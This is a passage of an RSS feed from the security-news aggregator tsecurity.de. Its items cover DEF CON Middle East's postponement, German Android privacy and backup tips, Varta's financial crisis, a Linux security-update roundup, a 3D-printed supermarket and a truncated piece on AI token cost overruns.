    For this reason, we have decided to postpone DEF CON Middle East. The evolving security situation in the region makes it impossible to concentrate on delivering the experience attendees deserve.
    We understand that this news is disappoin...]]></description>
<link>https://tsecurity.de/de/3691751/hacking/def-con-middle-east-postponed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691751/hacking/def-con-middle-east-postponed/</guid>
<pubDate>Fri, 24 Jul 2026 16:07:28 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img src="https://defcon.org/images/defcon-middle-east/dcme-postponed.webp" alt="DEF CON Middle East postponed"> </p>

    <p>The safety of our community is our highest priority.<br><br>
    For this reason, we have decided to postpone DEF CON Middle East. The evolving security situation in the region makes it impossible to concentrate on delivering the experience attendees deserve.<br><br>
    We understand that this news is disappointing, but we believe it's the most responsible choice right now. We look forward to bringing the full DEF CON experience to friends new and old in Bahrain, and we will share new dates and information as soon as they are confirmed.<br><br>
    In the meantime, we'd like to offer our sincere thanks to the community, sponsors, and supporters for their understanding and continued trust. We hope and expect to welcome you to DEF CON Middle East soon, under better circumstances for everyone.<br><br>
    -The DEF CON Middle East Team</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues Android-Handy: Diese fünf Einstellungen ändere ich sofort]]></title>
<description><![CDATA[Jedes neue Android-Smartphone durchläuft bei mir dasselbe Ritual: Noch bevor die erste App startet, klicke ich mich durch fünf Einstellungen, die – wie ich finde – jedes Handy von Werksseite aus schon (de-)aktiviert haben sollte. Welche das sind, zeige ich Schritt für Schritt.



Hinweis: Ich sel...]]></description>
<link>https://tsecurity.de/de/3691697/windows-tipps/neues-android-handy-diese-fuenf-einstellungen-aendere-ich-sofort/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691697/windows-tipps/neues-android-handy-diese-fuenf-einstellungen-aendere-ich-sofort/</guid>
<pubDate>Fri, 24 Jul 2026 15:35:26 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Jedes neue <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Android-Smartphone </a>durchläuft bei mir dasselbe Ritual: Noch bevor die erste App startet, klicke ich mich durch fünf Einstellungen, die – wie ich finde – jedes Handy von Werksseite aus schon (de-)aktiviert haben sollte. Welche das sind, zeige ich Schritt für Schritt.</p>



<p><strong>Hinweis:</strong> Ich selbst nutze ein Samsung-Smartphone. Die genauen Menüpfade und Bezeichnungen, die Sie in diesem Artikel finden, können bei anderen Android-Herstellern leicht abweichen. Die grundlegenden Funktionen finden Sie aber bei jedem Android-Gerät, meist nur unter leicht anderem Namen oder an anderer Stelle in den Einstellungen.</p>



<h2 class="wp-block-heading toc">1. Personalisierte Werbung deaktivieren</h2>



<p>Google und viele App-Anbieter verknüpfen Ihr Nutzungsverhalten über eine sogenannte Werbe-ID mit Ihrem Profil, um Anzeigen zuzuschneiden. Ich schalte das ab, weil ich schlicht nicht möchte, dass mein halbes digitales Leben zu Werbezwecken ausgewertet wird:</p>



<ol class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen &gt; </strong><strong>Sicherheit &amp; Datenschutz</strong><strong> &gt; </strong><strong>Weitere Datenschutzeinstellungen</strong>.</li>



<li>Deaktivieren Sie im Abschnitt <strong>Google</strong> die Funktion “Android-Personalisierungsdienst” und tippen Sie anschließend auf “Werbung” &gt; “Werbe-ID löschen”.</li>
</ol>



<p>Damit unterbinden Sie zwar nicht jede Form von Werbung, aber die Anzeigen werden deutlich weniger zielgerichtet auf Sie persönlich ausgespielt. Mehr zu versteckten Tracking-Funktionen von Google lesen Sie hier: <a href="https://pcwelt.de/article/1201382/diese-google-funktion-ueberwacht-sie-heimlich-so-schalten-sie-diese-ab.html" target="_blank" rel="noreferrer noopener">Diese Google-Funktion überwacht Sie heimlich – so deaktivieren Sie das</a>.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a636a0546a3f"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/vs.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Android Werbung deaktivieren" class="wp-image-3185478" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>So viel Datenschutz muss sein: Personalisierte Werbung mitsamt Werbe-ID lässt sich in den Datenschutz-Einstellungen löschen oder deaktivieren.</p><br></figcaption></figure><p class="imageCredit">PC-Welt</p></div>



<p>Wenn Sie es mit Datentracking ganz genau nehmen, empfehle ich Ihnen, unter <strong>myaccount.google.com</strong> noch die Aktivitätseinstellungen für Ihr Google-Konto zu prüfen.</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading toc">2. Sperrbildschirm-Benachrichtigungen ohne Inhalte anzeigen</h2>



<p>Standardmäßig zeigt Android Nachrichteninhalte, Absendernamen und teils sogar Codes für die <a href="https://www.pcwelt.de/article/1206889/zwei-faktor-authentifizierung-alles-was-sie-wissen-muessen.html" data-type="link" data-id="https://www.pcwelt.de/article/1206889/zwei-faktor-authentifizierung-alles-was-sie-wissen-muessen.html" target="_blank" rel="noreferrer noopener">Zwei-Faktor-Authentifizierung</a> direkt auf dem gesperrten Bildschirm an – lesbar für jeden, der Ihr Handy in die Hand nimmt! Das ändere ich als Erstes, sobald ein Gerät neu eingerichtet ist:</p>



<ol class="wp-block-list">
<li>Gehen Sie zu <strong>Einstellungen &gt; Benachrichtigungen</strong>.</li>



<li>Wählen Sie “Inhalt bei Sperrung ausblenden”.</li>



<li>Stellen Sie auf “In gesperrtem Zustand ausblenden”.</li>
</ol>



<p>Sie können das Ganze auch einzeln pro App festlegen, statt nur systemweit: Öffnen Sie dazu <strong>Einstellungen &gt; Apps &gt; [gewünschte App] &gt; Benachrichtigungen</strong> und legen Sie dort separat fest, ob Nachrichteninhalte dieser App auf dem Sperrbildschirm angezeigt oder ausgeblendet werden sollen. </p>



<p>Eine ausführliche Übersicht weiterer Schutzmaßnahmen finden Sie in diesem Ratgeber: <a href="https://www.pcwelt.de/article/3067254/android-datenschutzeinstellungen-smartphone-schuetzen-tipps.html" target="_blank" rel="noreferrer noopener">Schützen Sie Ihr Smartphone mit diesen 7 Android-Datenschutzeinstellungen</a>.</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading toc">3. Akku-Optimierung pro App statt pauschalem Sparmodus</h2>



<p>Den generischen Energiesparmodus finde ich zu grob, zumal ich Apps habe, die im Sparmodus nicht optimal laufen können. Deshalb schränke ich gezielt die Apps ein, die im Hintergrund unnötig Strom ziehen, und passe ein paar Display-Einstellungen an:</p>



<ol class="wp-block-list">
<li>Öffnen Sie zunächst <strong>Einstellungen &gt; Akku. </strong>Unterhalb der Nutzungsanzeige sehen Sie, welche Apps am meisten Akku verbrauchen. Öffnen Sie nun diese akku-hungrigen Apps unter <strong>Einstellungen &gt; Apps &gt; [App] &gt; Akku</strong> und stellen Sie die Einstellung von “Nicht eingeschränkt” auf “Optimiert” oder “Eingeschränkt”.</li>



<li>Reduzieren Sie unter <strong>Einstellungen &gt; Anzeige</strong> die Bildwiederholrate von 90/120 Hertz auf 60 Hertz (bei Samsung “Standard“), falls Sie keine animationsreichen Spiele spielen und auch sonst nicht besonders auf butterweiches Scrollen angewiesen sind. Beim reinen Surfen, Chatten oder Videoschauen fällt Ihnen der Unterschied kaum auf, da Filme und Serien ohnehin überwiegend mit deutlich niedrigerer Bildrate laufen.</li>



<li>Deaktivieren Sie <strong>Always-on-Display </strong>(unter<strong> Einstellungen &gt; Sperrbildschirm und AOD</strong>), wenn Sie es ohnehin selten ansehen.</li>
</ol>



<p>Diese drei Handgriffe bringen im Alltag oft mehr als jeder Sparmodus-Knopf. Hier finden Sie eine vollständige Liste weiterer Stellschrauben: <a href="https://www.pcwelt.de/article/3154399/smartphone-mehr-akkulaufzeit-einstellungen.html" target="_blank" rel="noreferrer noopener">13 Einstellungen, mit denen Ihr Smartphone-Akku länger hält</a>.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a636a0547aeb"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/vs-1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Akkuschonende Einstellungen für Android" class="wp-image-3185479" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Mit wenigen Klicks erhöhen Sie Ihre Akkulaufzeit sofort. Im Bild zu sehen: Akkuverbrauch (links), Einstellungen für die Bildwiederholrate (Mitte) und deaktiviertes Always-On-Display (rechts).</p> <br></figcaption></figure><p class="imageCredit">PC-Welt</p></div>



<h2 class="wp-block-heading toc">4. Berührungsempfindlichkeit für Displayschutzfolien aktivieren</h2>



<p>Ohne Panzerglasfolie auf dem Display geht bei mir gar nichts. Allerdings kenne ich noch die Zeiten, in denen ich mich mit hakeligen Wischgesten und dem Entsperren per Fingerabdruck herumschlagen musste, weil die Touchscreen-Eingaben durch die Folien stark gedämpft waren.</p>



<p>Eines Tages bin ich auf die Einstellung “Berührungsempfindlichkeit“ gestoßen und – siehe da – alle Folien-Probleme haben sich in Luft aufgelöst. Diese Einstellung ändere ich deshalb bei jedem neuen Handy mit Schutzfolie sofort<strong>:</strong></p>



<ol class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen &gt; Anzeige</strong>.</li>



<li>Suchen Sie den Punkt “Berührungsempfindlichkeit” und aktivieren Sie ihn.</li>
</ol>



<p>Mit aktivierter Berührungsempfindlichkeit reagiert der Touchscreen wieder so präzise wie ohne Folie. Sie werden den Unterschied sofort bemerken.</p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading toc">5. Automatisches Backup sofort aktivieren</h2>



<p>Zum Glück habe ich noch nie ein Backup meiner Daten benötigt, aber allein der Gedanke an ein verlorenes, gestohlenes oder kaputtes Handy ohne Sicherung reicht mir, um bei jedem neuen Gerät sofort vorzusorgen. Denn das Aktivieren geht wirklich super schnell und reibungslos:</p>



<ol class="wp-block-list">
<li>Öffnen Sie <strong>Einstellungen &gt; Konten und Sicherung</strong>.</li>



<li>Falls Sie ein Samsung-Handy haben: Tippen Sie unter <strong>Samsung Cloud</strong> auf “Daten sichern”<strong>,</strong> um Kontakte, Kalender, Notizen und App-Daten geräteseitig zu sichern.</li>



<li>Aktivieren Sie zusätzlich im selben Menü das Backup über <strong>Google Drive</strong>, damit Ihre wichtigsten Daten auch herstellerunabhängig gesichert sind.</li>



<li>Öffnen Sie außerdem <strong>Google Fotos</strong> und schalten Sie dort separat die <strong>automatische Sicherung</strong> für Fotos und Videos ein.</li>



<li>Aktivieren Sie bei Bedarf zusätzlich das Backup für Messenger wie Whatsapp (Einstellungen innerhalb der jeweiligen App).</li>
</ol>



<p>Wie Sie beim Gerätewechsel wirklich alle Daten mitnehmen – inklusive Chatverläufe und Einstellungen –, beschreiben wir in <a href="https://www.pcwelt.de/article/1160002/smartphone-wechsel-daten-umziehen.html" target="_blank" rel="noreferrer noopener">Smartphone-Umzug: So nehmen Sie Ihre Daten mit</a>. Eine komplette Einrichtungs-Checkliste für ein neues Gerät liefert außerdem der Leitfaden <a href="https://www.pcwelt.de/article/2580881/neues-android-smartphone-einrichten-howto.html" target="_blank" rel="noreferrer noopener">So richten Sie Ihr neues Android-Smartphone ein</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Containers: Diese Browser-Erweiterung ist ein echter Geheimtipp]]></title>
<description><![CDATA[Webseiten abschotten, das Tracking eindämmen oder zwei Accounts gleichzeitig nutzen? Inkognito-Tabs sind dafür zu umständlich. Eine kostenlose Firefox-Erweiterung schafft Abhilfe. Wir zeigen dir, wie du sie in Minuten einrichtest und die "Container" nutzt.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3691668/it-security-nachrichten/firefox-containers-diese-browser-erweiterung-ist-ein-echter-geheimtipp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691668/it-security-nachrichten/firefox-containers-diese-browser-erweiterung-ist-ein-echter-geheimtipp/</guid>
<pubDate>Fri, 24 Jul 2026 15:30:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/faq/352"><img hspace="5" border="0" align="left" alt="Browser, Firefox, Mozilla, Webbrowser, Mozilla Firefox, Multitasking, Erweiterungen, Container, Accounts, Firefox Browser, Addons, Inkognito" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/92293.jpg"></a>
			Webseiten abschotten, das Tracking eindämmen oder zwei Accounts gleichzeitig nutzen? Inkognito-Tabs sind dafür zu umständlich. Eine kostenlose Firefox-Erweiterung schafft Abhilfe. Wir zeigen dir, wie du sie in Minuten einrichtest und die "Container" nutzt.			(<a href="https://winfuture.de/faq/352">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Varta in der Krise: Zerschlagung droht – aber Rettung möglich]]></title>
<description><![CDATA[Ein weiterer Rückschlag für den deutschen Batteriehersteller Varta: Wie die FAZ berichtet, habe der Konzern die Ziele der Investoren nicht erreicht und soll nun zerschlagen werden.



Vier Hauptgläubiger, darunter die Deutsche Bank und drei britische Investmentfonds, machen von ihren Rechten Gebr...]]></description>
<link>https://tsecurity.de/de/3691654/it-nachrichten/varta-in-der-krise-zerschlagung-droht-aber-rettung-moeglich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691654/it-nachrichten/varta-in-der-krise-zerschlagung-droht-aber-rettung-moeglich/</guid>
<pubDate>Fri, 24 Jul 2026 15:21:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein weiterer Rückschlag für den deutschen Batteriehersteller Varta: Wie die FAZ <a href="https://www.faz.net/aktuell/wirtschaft/unternehmen/batteriehersteller-glaeubiger-zerschlagen-varta-201054262.html">berichtet</a>, habe der Konzern die Ziele der Investoren nicht erreicht und soll nun zerschlagen werden.</p>



<p>Vier Hauptgläubiger, darunter die Deutsche Bank und drei britische Investmentfonds, machen von ihren Rechten Gebrauch und beschließen, den weiterhin lukrativen Geschäftsbereich Haushaltsbatterien auszugliedern. Ursache für den Rückzug der Gläubiger sei ein „operativer Liquiditätsbedarf im mittleren zweistelligen Millionenbereich“, den die Anteilseigner nicht mehr bereit waren, zusätzlich zu investieren, erklären sie.</p>



<p>Varta war 2022 in die finanzielle Schieflage geraten, nachdem Apple, der größte Kunde, das Unternehmen als einzigen Hersteller von Airpods-Akkus um einen zweiten Zulieferer aus China ergänzt hatte. 2025 hörte Apple dann endgültig auf, Akkus von Varta zu beziehen. Dadurch brachen finanzielle Mittel weg, mit denen der Konzern, der dem österreichischen Unternehmer Michael Tojner <a href="https://www.pcwelt.de/article/2634264/porsche-reisst-sich-varta-unter-den-nagel-kleinaktionaere-enteignet.html" target="_blank" rel="noreferrer noopener">und Porsche gehört</a>, die Sanierung bewältigen wollte.</p>



<p>Noch ist die Zerschlagung von Varta jedoch nicht besiegelt: Der Schweizer Investor Allswiss hatte im Juni angeboten, die Schulden zu übernehmen „und den Hersteller zu stabilisieren“, wie die FAZ fortführt. Vom Verkauf der Haushaltssparte ist er wenig begeistert und wirft der Deutschen Bank und den britischen Investoren vor, Varta „nicht verkaufen, sondern verwerten“ zu wollen, „auf Kosten des Unternehmens, seiner Beschäftigten und der übrigen Gläubiger“.</p>



<p>Allswiss habe der Gläubigergruppe eine Frist bis Freitag (heute) gesetzt, die Zerschlagung unzustellen und Bedingungen für eine Übernahme durch Allswiss mitzuteilen. Auch die Länder Baden-Württemberg und Saarland haben sich inzwischen als Ziel gesetzt, Varta als Ganzes zu erhalten.</p>



<p>Den Haupteigentümer Tojner wundert der Plan der Gläubiger indes nicht, <a href="https://www.augsburger-allgemeine.de/wirtschaft/varta-investor-tojner-verspricht-fortfuehrung-von-firmenteilen-weiteres-sanierungsverfahren-und-harte-einschnitte-1-114847012">erklärt er</a> der Augsburger Allgemeinen. Den Rest des Unternehmens, der nach dem Verkauf der Sparte für Haushaltsbatterien übrig bliebe, will er sanieren und „in Nischenbereichen“ positionieren.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (glibc, java-21-openjdk, kernel, and libpq), Debian (imagemagick, spice-vdagent, and webkit2gtk), Fedora (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), Mageia (apache, cifs-utils, dnsmasq, lrzip, and s...]]></description>
<link>https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (glibc, java-21-openjdk, kernel, and libpq), <b>Debian</b> (imagemagick, spice-vdagent, and webkit2gtk), <b>Fedora</b> (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), <b>Mageia</b> (apache, cifs-utils, dnsmasq, lrzip, and socat), <b>Oracle</b> (.NET 10.0, .NET 9.0, 389-ds-base, cups, edk2, fence-agents, firefox, freeipmi, freerdp, git-lfs, glib2, gnutls, golang, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, libinput, libvirt, libxml2, memcached, nginx, openexr, perl-DBI, perl-XML-LibXML, php, php8.4, plexus-utils, postgresql16, python3.12, python3.14, sssd, tomcat, tomcat9, unbound, vim, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (container-tools:rhel8, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, host-metering, java-1.8.0-openjdk, java-11-openjdk with Extended Lifecycle Support, java-17-openjdk, java-21-openjdk, oci-seccomp-bpf-hook, rhc, rhc-worker-playbook, skopeo, xorg-x11-server, xorg-x11-server-Xwayland, and yggdrasil), <b>Slackware</b> (mozilla-thunderbird), <b>SUSE</b> (afterburn, alloy, apache-sshd, apache2, avahi, chromium, clamav, curl, dhcpcd, dnsmasq, docker-compose, ffmpeg-7, firefox-esr, gawk, glibc, gnutls, go1.26-openssl, google-osconfig-agent, gpg2, haproxy, ImageMagick, imagemagick, jline3, jq, kernel, libgcrypt, libgnt, meson, pidgin, nmap, nodejs24, pacemaker, patch, perl-HTML-Parser, perl-libwww-perl, perl-List-SomeUtils-XS, python-aiohttp, python-WebOb, qemu, rust-keylime, SVT-AV1, libyuv0, libaom3, trivy, ucode-intel, and wireshark), and <b>Ubuntu</b> (libhttp-date-perl, libxpm, linux-azure, linux-azure-fde, pam, and rsyslog).]]></content:encoded>
</item>
<item>
<title><![CDATA[Netto erhält weltweit ersten Supermarkt aus dem 3D-Drucker]]></title>
<description><![CDATA[Im Schwarzwald entsteht der weltweit erste Supermarkt aus dem 3D-Drucker.
Aleksej Keksel



In der beschaulichen Gemeinde Neubulach im Nordschwarzwald nähe Calw wird derzeit Bau- und Digitalgeschichte geschrieben. Denn hier findet eine Weltpremiere statt: Es entsteht der weltweit erste Supermarkt...]]></description>
<link>https://tsecurity.de/de/3691541/it-security-nachrichten/netto-erhaelt-weltweit-ersten-supermarkt-aus-dem-3d-drucker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691541/it-security-nachrichten/netto-erhaelt-weltweit-ersten-supermarkt-aus-dem-3d-drucker/</guid>
<pubDate>Fri, 24 Jul 2026 14:39:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/3D-Druck-Supermarkt-Neubulach_04-scaled_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Printing" class="wp-image-4201215" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Im Schwarzwald entsteht der weltweit erste Supermarkt aus dem 3D-Drucker.</p>
</figcaption></figure><p class="imageCredit">Aleksej Keksel</p></div>



<p class="wp-block-paragraph">In der beschaulichen Gemeinde <a href="https://de.wikipedia.org/wiki/Neubulach" target="_blank" rel="noreferrer noopener">Neubulach</a> im Nordschwarzwald nähe Calw wird derzeit Bau- und Digitalgeschichte geschrieben. Denn hier findet eine Weltpremiere statt: Es entsteht der weltweit erste Supermarkt aus dem 3D-Betondrucker. Mieter wird der Discounter Netto.</p>



<p class="wp-block-paragraph">Mit einer Grundfläche von rund 1.700 Quadratmetern und einer gedruckten Wandfläche von über 1.300 Quadratmetern setzt das Projekt neue Maßstäbe für den industriellen Einsatz automatisierter Bauverfahren. Wo früher Maurer Stein auf Stein setzten, ziehen heute zwei mobile <a href="https://instatiq.com/" target="_blank" rel="noreferrer noopener">Instatiq</a> P1 Roboter (Progress One) präzise ihre Bahnen.</p>



<h2 class="wp-block-heading">Roboter statt Kelle und Mörtel</h2>



<p class="wp-block-paragraph">Die Maschinen spritzen den Beton Schicht für Schicht übereinander, bis Wände mit einer Höhe von bis zu sieben Metern entstehen. Dabei können die Roboter auf der Baustelle flexibel umgesetzt und neu positioniert werden. Das ermöglicht den Bau großflächiger Gewerbeimmobilien in Rekordzeit.</p>



<p class="wp-block-paragraph">So wurde der gesamte Wandrohbau inklusive aller baulichen Schnittstellen in nur etwa vier Wochen realisiert. „Mit dem ersten gedruckten Supermarkt zeigen wir, dass 3D-Druck im realen Gewerbebau angekommen ist“, erklärt Markus Schilling von Instatiq. Gleichzeitig zeigt das Projekt, dass der 3D-Druck nicht länger nur für <a href="https://www.computerwoche.de/article/2800278/die-ersten-haeuser-aus-dem-printer.html?utm=hybrid_search">kleine Pilotprojekte oder Wohnhäuser</a> reserviert ist. Für Optimisten stellt er gar eine wirtschaftlich relevante Alternative für den großflächigen Handel dar.</p>



<h2 class="wp-block-heading">Grüner Beton</h2>



<p class="wp-block-paragraph">Während die Druckroboter die Hauptarbeit an den Wänden leisten, wird die Konstruktion durch konventionelle Bauteile wie Stützen und Ringbalken ergänzt. Diese Verzahnung von digitaler Bauvorbereitung und klassischem Rohbau war eine der Herausforderungen, die durch die Zusammenarbeit von Firmen wie <a href="https://nelcon.de/">Nelcon</a> und der Köhler Bauunternehmung gemeistert wurde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/3D-Druck-Supermarkt-Neubulach_05-scaled_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Printing" class="wp-image-4201216" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Schicht für Schicht werden die Wände aus fast CO₂-neutralem Beton gedruckt.</p></figcaption></figure><p class="imageCredit">Aleksej Keksel</p></div>



<p class="wp-block-paragraph">Doch nicht nur die Technik ist revolutionär, sondern auch das Material. Zum ersten Mal wird bei einem solchen Großprojekt der Near-Zero-Zement evoZero von <a href="https://www.heidelbergmaterials.de/de" target="_blank" rel="noreferrer noopener">Heidelberg Materials</a> eingesetzt. Dieser Zement basiert auf der sogenannten CCS-Technologie (Carbon Capture and Storage). Dabei wird das CO₂ direkt im Werk im norwegischen Brevik abgeschieden und anschließend dauerhaft im Meeresboden gespeichert.</p>



<h2 class="wp-block-heading">Nachhaltiger Gewerbebau</h2>



<p class="wp-block-paragraph">Das Ergebnis ist ein 3D-Druckbeton, der signifikant weniger CO₂ verursacht, ohne dass die Rezeptur oder die technischen Eigenschaften – wie Pumpfähigkeit und Formstabilität – verändert wurden. Matthias Fischer von Heidelberg Materials betont denn auch: „Hier kommen zwei zukunftsweisende Ansätze unter realen Bedingungen zusammen: innovative Materialien und neue Bauverfahren.“</p>



<p class="wp-block-paragraph">Hinter dem Projekt steht ein breites Partnernetzwerk. Bauherr ist die Bäckerei Sehne, die das Gebäude nach Fertigstellung an den Lebensmittelhändler Netto Marken-Discount vermieten wird. Für Netto ist die Filiale in Neubulach ein klares Bekenntnis zu Innovation und Ressourcenschonung. So heißt es bei dem Discounter: „Der Einsatz von 3D-Druck zeigt, wie sich innovative Technologien bereits heute effizient und nachhaltiger im Filialbau einsetzen lassen.“</p>



<p class="wp-block-paragraph">Unter dem Strich ist der Supermarkt in Neubulach mehr als nur ein Gebäude. Er ist schlicht ein Beweis dafür, dass automatisiertes, schnelles und nachhaltigeres Bauen keine Zukunftsmusik mehr ist. Mit rund 292 Kubikmetern Druckbeton ist das Projekt laut Instatiq derzeit das weltweit größte realisierte 3D-gedruckte Gebäude.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alienware 15 review: Perfect timing for a budget gaming laptop]]></title>
<description><![CDATA[While its display could be nicer, Alienware's first budget gaming laptop feels like a welcome reprieve when practically all tech is more expensive.]]></description>
<link>https://tsecurity.de/de/3691530/it-nachrichten/alienware-15-review-perfect-timing-for-a-budget-gaming-laptop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691530/it-nachrichten/alienware-15-review-perfect-timing-for-a-budget-gaming-laptop/</guid>
<pubDate>Fri, 24 Jul 2026 14:33:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While its display could be nicer, Alienware's first budget gaming laptop feels like a welcome reprieve when practically all tech is more expensive.]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Fri, 24 Jul 2026 14:04:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



